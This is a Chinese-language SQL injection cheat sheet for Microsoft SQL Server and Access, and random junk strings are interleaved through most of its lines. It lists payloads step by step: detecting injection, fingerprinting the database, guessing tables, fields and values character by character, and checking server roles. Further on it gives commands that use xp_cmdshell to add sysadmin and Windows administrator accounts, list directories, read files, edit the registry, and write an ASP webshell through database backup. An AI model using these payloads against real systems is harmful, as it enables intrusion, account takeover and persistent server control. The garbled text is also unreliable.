1.判断是否有注入;and 1=1 ;and 1=2 <>6j>w_|
2.初步判断是否是mssql ;and user>0 Y(Oh7VwY*P
HoPpUq5,
3.注入参数是字符'and [查询条件] and ''=' f3O6&1D
oz&`3`
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 6:5K?Yo
)R7Sh51P
5.判断数据库系统 C6)YZC
~&RTLr#\*M
;and (select count(*) from sysobjects)>0 mssql -'Z Gc8)
.I:rb~&
;and (select count(*) from msysobjects)>0 access >[ B.y
s#Dj>Fej
r,;ca6>5H
7I;kh`H$(f
6.猜数据库 ;and (select Count(*) from [数据库名])>0 (H_dZL
'?C6P5fm
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 7Bj,{9^aJ
MhN;GMH
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 I/7!5Z*
t^'nh
1=
9.(1)猜字段的ascii值(access) 2u$-(JfoS
,)`_?^\$f
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 %}@iz(*}>
i >3`V6
(2)猜字段的ascii值(mssql) ?W'z5'|
nkHl;;WJ
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 !R8%C!=a
R&|.Lvmc/
10.测试权限结构(mssql) L3{(Bu
2Wzx1_D"a
HTh?&u\QG
>W> rhxU
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- }r,M(Zr
h:fiUCw
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- [e><^R*u
9d"*Z%!j
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 5e7Y M@ng
ox&5}&\
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 3%*igpj\)
z 3aGK
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 5Od%Jhtt
PIH\*2\/
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 1h@qcom9K_
@JGmOwZ
;and 1=(select IS_MEMBER('db_owner'));-- 4vg3F(
:$D*ab^^P
ehW [LRtq
qcs)
p
11.添加mssql和系统的帐户 _UVpQ5pN
8C{&i5kj\E
;exec master.dbo.sp_addlogin username;-- UPH#~D!
;exec master.dbo.sp_password null,username,password;-- .,u>WIUxj
OQumAj
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- eu5te0{G
KSs1EmB
;exec master.dbo.xp_cmdshell 'net user username password rf0Z5.
<)ZQRE@
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- |5vcT,A
q=3>ij{v
;exec master.dbo.xp_cmdshell 'net user username password /add';-- D=ej%]@iw
Mqr]e#"o
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- O}"oz3H
yx8G9SO?
PMP{|yEx"
1"y!wsM%
12.(1)遍历目录 9p8ajlYg,
^8&}Nk[ j
;create table dirs(paths varchar(100), id int) UC+Qn
jV2H61d
;insert dirs exec master.dbo.xp_dirtree 'c:\' d>f;N+O%
/<-PW9X?
;and (select top 1 paths from dirs)>0 !*v%
s
OH@"]Nc~
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 44e]sT.B
k^}[+IFJ
-f |/#1
SNqSp.>-U"
(2)遍历目录 1NP
<PSz`)SN
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Lc~m`=B
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 x/<ow4C
mW{;$@PLF"
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 N[
=I
JA4Zg*7I
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 i$y=tJehi
bkJ bnW=
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 .6gx|V+
,t 2CQ
-o+t&m
P'VHga
13.mssql中的存储过程 )>ML7y
&m--}
xp_regenumvalues 注册表根键, 子键 l-w4E"n3
3}}/,pGSc
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 eY3:Nl^
]L~z9)
xp_regread 根键,子键,键值名 IX+Jf? &^
nC3+Zka
;exec xp_regread wwl,F=| Y
).kU7;0
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 x[t?hl=:
"22./vWV|i
xp_regwrite 根键,子键, 值名, 值类型, 值 R"OT&:0/
`&NFl'l1C
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 v.W!
"5eD
>!
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 lB27Z}
oI-Fr0!
xp_regdeletevalue 根键,子键,值名 &m5^
YN$b
L@\t]
~
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 W,~*pyLdO
W^elzN(
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 W\[E
^U~Er'mT
E{6ku=2F
k?h{6Qd
14.mssql的backup创建webshell `G ":y[Q
\zJ^XpC
use model sA6Hk B.
?e-rwaW
create table cmd(str image); No\#N/1@P
( &m1*
insert into cmd(str) values (''); )%jS9e{d
L\ysy2E0
backup database model to disk='c:\l.asp'; q[/g3D\G
_dd_Z40R
IRM jL.q
%enJ[a%Qg
15.mssql内置函数 <@`K^g;W
~6#mVP5sU)
;and (select @@version)>0 获得Windows的版本号 s;h`n$
S*}GW-)oA
;and user_name()='dbo' 判断当前系统的连接用户是不是sa =3,<(F5Y[
cMi9 Z]
;and (select user_name())>0 爆当前系统的连接用户 |g7)A?2J~
NH/jkt&F[
;and (select db_name())>0 得到当前连接的数据库 ?bd!JW bg`
4oF,;o+v\4
36'J9h\
rKPsv*w
16.简洁的webshell 2;]tIt d1
lJa-O
use model toF6 Z
'NWvQR<X
create table cmd(str image); w32F?78]
AkjoD7.*
insert into cmd(str) values (''); h1>.w
pr
p,WBF
backup database model to disk='g:\wwwtest\l.asp';